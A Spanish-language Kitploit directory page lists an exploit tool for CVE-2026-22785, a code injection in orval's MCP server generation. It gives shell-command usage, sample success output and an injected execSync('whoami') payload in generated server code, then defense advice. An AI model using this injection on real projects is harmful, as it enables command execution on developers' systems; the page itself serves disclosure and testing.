Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22785 — Herramienta de explotación para CVE-2026-22785, una inyección de código crítica en orval < 7.18.0. Proporciona ejecución de comandos de shell y escaneo de archivos para demostrar la vulnerabilidad y verificar la inyección de payloads. | Kitploit
Herramientas/GitHubGitHub/langbyyi/cve-2026-22785
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebAprendizaje y Educación
GitHublangbyyi/cve-2026-22785

CVE-2026-22785

Herramienta de explotación para CVE-2026-22785, una inyección de código crítica en orval < 7.18.0. Proporciona ejecución de comandos de shell y escaneo de archivos para demostrar la vulnerabilidad y verificar la inyección de payloads.

Ver Repositorio
1hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Tutorial de reproducción de CVE-2026-22785

Resumen de la vulnerabilidad

  • CVE: CVE-2026-22785
  • Impacto: orval < 7.18.0
  • Corrección: orval >= 7.18.0
  • CVSS: 9.3 CRÍTICO
  • Tipo: Inyección de código

Principio de la vulnerabilidad

orval < 7.18.0, al generar código de servidor MCP, concatena directamente el campo summary de la especificación OpenAPI en la plantilla sin escapar, lo que provoca una inyección de código.

Pasos de reproducción

1. Preparación del entorno

root@kitploit:~
cd exploit
npm install

2. Uso de la herramienta

root@kitploit:~
# Ejecutar comando (explotación de vulnerabilidad)
python cve_tool.py shell <comando>

# Ejemplo
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir

# Escanear archivo
python cve_tool.py scan <archivo>

3. Explicación de la salida

root@kitploit:~
<salida del comando>
[+] CVE-2026-22785: Inyección de payload exitosa
[+] Ubicación de la inyección: server.ts:31

Evidencia de la vulnerabilidad

Código generado en server.ts:

root@kitploit:~
server.tool(
  'getApiDemo',
  'API.' + require('child_process').execSync('whoami', {}),//',
  getApiDemoHandler
);

Recomendaciones de defensa

  1. Actualizar orval a >= 7.18.0
  2. Verificar el origen de las especificaciones OpenAPI
  3. Revisar el código generado
Descargar herramienta